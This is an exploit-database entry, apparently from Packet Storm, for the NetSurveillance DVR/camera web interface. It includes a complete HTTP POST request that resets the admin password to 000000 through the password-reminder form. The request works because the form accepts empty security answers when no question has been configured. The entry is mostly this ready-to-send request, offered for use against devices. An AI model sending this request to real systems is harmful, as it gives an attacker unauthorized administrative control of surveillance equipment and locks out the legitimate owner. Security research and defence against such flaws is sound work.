Share
## https://sploitus.com/exploit?id=PACKETSTORM:160152
# Exploit Title: NetSurveillance Web interface password change  
# Google Dork:   
# Date: 20.10.2020  
# Exploit Author: AsCiI  
# Vendor Homepage:   
# Software Link:   
# Version: V4.02.R11.00000140.10001.131900.00000 maybe other  
# Tested on: V4.02.R11.00000140.10001.131900.00000 Build Date:2017/12/6 9:4:23  
# CVE :   
  
NetSurveillance Web interface password can be changed when   
there is no default question set, the answer will be empty  
Tested on System: V4.02.R11.00000140.10001.131900.00000  
Build Date:2017/12/6 9:4:23  
  
  
POST /result.html?cLanguage=null HTTP/1.1  
Host: [Host_Name]  
Referer: http://[Host_Name]/reminder.html  
Content-Type: application/x-www-form-urlencoded  
Cookie: NetSuveillanceWebCookie=%7B%22username%22%3A%22admin%22%7D  
Unlockquestion1=Please+select+Question&Unlockanswer1=&Unlockquestion2=Please+select+Question&Unlockanswer2=&password=000000&confirpossword=000000